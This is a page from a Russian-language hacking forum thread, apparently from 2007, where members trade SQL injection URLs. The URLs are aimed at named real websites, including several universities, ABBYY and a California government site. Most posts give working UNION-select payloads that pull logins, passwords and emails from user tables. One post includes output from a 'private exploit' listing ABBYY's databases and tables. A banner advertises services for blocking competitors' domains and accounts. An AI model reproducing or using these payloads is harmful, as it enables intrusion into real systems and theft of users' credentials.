SQL Инъекции

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 296 из 1602

296

Опции темы

Поиск в этой теме

Опции просмотра

01.09.2007, 19:36

Joker-jar

Постоянный

Регистрация: 11.03.2007

Сообщений: 581

С нами: 10088966

Репутация: 646

Сайт: d v g a m e s . r u
Уязвимость: уязвим параметр dvglasid (Cookies)

dvglasid=-1+union+select+1,2,concat(login,0x3a,password,0x3a ,email)+from+users

Enjoy

𝕏 Twitter Reddit Telegram Копировать ссылку

01.09.2007, 19:45

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

С нами: 9881483

Репутация: 569

.edu код: http://www.brockport.edu/athletics/news.php?id=-495'+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/* не смог подобрать ни одну таблицу

01.09.2007, 20:50

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

С нами: 9881483

Репутация: 569

.edu код: http://www.music.uiuc.edu/facultyBio.php?id=-61+union+select+1,2,table_name,4+from+information_ schema.tables/*

01.09.2007, 20:56

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

С нами: 9989667

Репутация: 240

lib.web-malina.com
"Самые интересные книги".

Код:

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/*

Код:

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

таблица users.

Код:

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,count(*),4,5,6,7,8,9+from+users/*

646 пользователей.

Код:

http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,name,pass,email),3,4,5,6,7,8,9+from+users+limit+150,1/*

Колонки name, pass, email.

01.09.2007, 23:05

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

С нами: 9881483

Репутация: 569

.edu последний на сегодня

код:http://www.ittc.ku.edu/view_project.phtml?id=-242+union+select+1,2,3,concat(version(),user(),dat abase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22/*
таблы не подбирал

02.09.2007, 01:18

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

С нами: 10153766

Репутация: 2565

ABBYY

Код:

http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--

Есть таблица user

02.09.2007, 23:41

xena-mil1

Познающий

Регистрация: 17.10.2006

Сообщений: 83

С нами: 10297512

Репутация: 55

Цитата:

Сообщение от [53x]Shadow

ABBYY

Код:

http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--

Есть таблица user

продолжение

Код:

SQL Injection Private Exploit


System user: publishing 
Database name: Publishing 
Server name: SQL2 
IS Sysadmin ? : 0 
User databases number: 43 
User tables count in curent DB: 461 
Permission to create tables: Yes 
SQL Server version: 2000 
Windows version: 2003 



referendum

participantsInfo 
FineReaderSprintForm 
current_situation 
lingvo_interface_voting 
Anketa_sdk 
Seminar2005 
Anketa_PDFTransformer_rus 
lingvoMabileDevisesTesting 
FineReaderForm 
voting_lingvo_cards 
Anketa_FineReaderHomeEdition 
goroda_users_words 
voting_lingvo_sound 
voting_abbyy_ru 
dtproperties 
FR67_Trial_User_Survey_USA 
DealersForm 
voting_lingvo_search 
Anketa_FineReaderHomeEdition_2 
FR8_User_Survey_USA 
voting_abbyy_com 
DB_Export 
FR8_Trial_User_Survey_USA 
syssegments 
questions_list 
Digital_Camera_OCR 
Anketa_FineReaderSprint 
lingvo_valentine 
voting_lingvo_default_page 
Anketa_AbbyyRuHelpPoll 
FinereaderPRO8_Requests 
lingvoMobileDevicesTesting 
Anketa_PDFTransformer_1 
Anketa_PDFTransformer_2 
subscribes_partner_portal 
promo_beaver_action 
sysconstraints 
Anketa_STO_1 
USA_PartnersRegistration 
voting_metro_lingvo_adv

Lingvo_forum_1_3 
 
Lingvo_forum_next 
 
certification 
 
msdb 
 
abbyyru_FRCE90 
 
LingvoBannersTracking 
 
ReportServer 
 
Dialog_Forum_new 
 
voting 
 
Lingvo_RegistrationNY 
 
tempdb 
 
Lingvo_Forum_new 
 
docflow_referendum 
 
Docflow_Forum 
 
LingvoDA_Forum 
 
covercd 
 
AdventureWorks2000 
 
abbyycom_PDFTransformer 
 
FormReader_Forms 
 
LingvoDa_Forum_new 
 
IPDatabase 
 
WebStats 
 
dialog21_referendum 
 
ReportServerTempDB 
 
FineReader_forum_R 
 
master 
 
Lingvo_Forum 
 
tsla 
 
review 
 
docflow 
 
subscribe 
 
lingvoDa_Dictionaries 
 
QuotGame 
 
LPDatabase 
 
model 
 
Dialog_Forum 
 
KnowledgeBase 
 
SuccessStories_test 
 
Docflow_Forum_new 
 
Publishing 
 
TrialForms 
 
pubs 
 
SuccessStories 
 
ForumDialog_1_3 
 
SuccessStories2 
 
LingvoDA_referendum 
 
docflow_registration

результат

xena military private sql injection exploit v2.0

Последний раз редактировалось _Great_; 04.09.2007 в 15:20.. Причина: километровым шрифтом писать не пробовал?

02.09.2007, 18:13

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

С нами: 10214321

Репутация: 552

Код:

http://www.arb.ca.gov/lispub/rss/displaypost.php?pno=-573+union+select+1,2,3,table_name,5+from+INFORMATION_SCHEMA.TABLES+limit+23,1/*

02.09.2007, 21:20

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

С нами: 9881483

Репутация: 569

edu

не смог вывести пароли логины,кроме фамилий,имен и т.д

код
:http://fs.cs.fhm.edu/mitglieder.phtml?id=-48+union+select+1,concat(column_name,char(58),tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14+from+informat ion_schema.columns+limit+650,1/*

Последний раз редактировалось fobofob; 02.09.2007 в 21:23..